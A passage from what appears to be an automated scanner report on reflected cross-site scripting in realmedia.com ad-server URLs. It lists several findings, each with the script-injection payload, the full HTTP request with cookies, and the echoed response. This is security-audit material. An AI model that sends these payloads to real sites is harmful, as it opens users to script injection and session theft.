Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:58 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia28bc9"><script>alert(1)</script>a17d56d34d0/Retarget_Secure/842430191/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.668. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31127"><script>alert(1)</script>5274148795f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure31127"><script>alert(1)</script>5274148795f/509694158@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 258
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:03 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure31127"><script>alert(1)</script>5274148795f/L18/29991517/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?29991517" TARGET=_blank>

4.669. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e11df"><script>alert(1)</script>5466936ca41 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3e11df"><script>alert(1)</script>5466936ca41?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 390
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:08 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/1309559056/Bottom3e11df"><script>alert(1)</script>5466936ca41/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.670. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf6c"><script>alert(1)</script>7f5cada5b68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia6cf6c"><script>alert(1)</script>7f5cada5b68/Retarget_Secure/536763197@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O1012Mr|O2016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 398
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:28 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia6cf6c"><script>alert(1)</script>7f5cada5b68/Retarget_Secure/1372372830/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.671. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1d5d"><script>alert(1)</script>38bef79c455 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secured1d5d"><script>alert(1)</script>38bef79c455/536763197@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O1012Mr|O2016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:33 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secured1d5d"><script>alert(1)</script>38bef79c455/L18/1392028664/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1392028664" TARGET=_blank>

4.672. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd1c9"><script>alert(1)</script>7b109254dda was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3dd1c9"><script>alert(1)</script>7b109254dda?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O1012Mr|O2016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 390
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:42 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/1435493673/Bottom3dd1c9"><script>alert(1)</script>7b109254dda/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.673. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 [_RM_HTML_MM_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de561"-alert(1)-"681c7535723 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3?_RM_HTML_MM_=101155000010000511001de561"-alert(1)-"681c7535723 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O1012Mr|O2016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:46:30 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1R10M5b|R10M5x|R10M62|R10M69|O1012Mr|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 601
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:37:32 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "101155000010000511001de561"-alert(1)-"681c7535723";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.674. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e57b0"><script>alert(1)</script>f90cf47e664 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediae57b0"><script>alert(1)</script>f90cf47e664/Retarget_Secure/567583486@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:24 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediae57b0"><script>alert(1)</script>f90cf47e664/Retarget_Secure/756431560/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.675. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44397"><script>alert(1)</script>fa6f22d1dba was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure44397"><script>alert(1)</script>fa6f22d1dba/567583486@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:29 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure44397"><script>alert(1)</script>fa6f22d1dba/L18/1974447086/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1974447086" TARGET=_blank>

4.676. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f90c5"><script>alert(1)</script>c13f5dc77c7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3f90c5"><script>alert(1)</script>c13f5dc77c7?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:34 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/418268214/Bottom3f90c5"><script>alert(1)</script>c13f5dc77c7/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.677. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 [_RM_HTML_MM_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8130"-alert(1)-"538826cf67a was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3?_RM_HTML_MM_=101155000010000511001a8130"-alert(1)-"538826cf67a HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
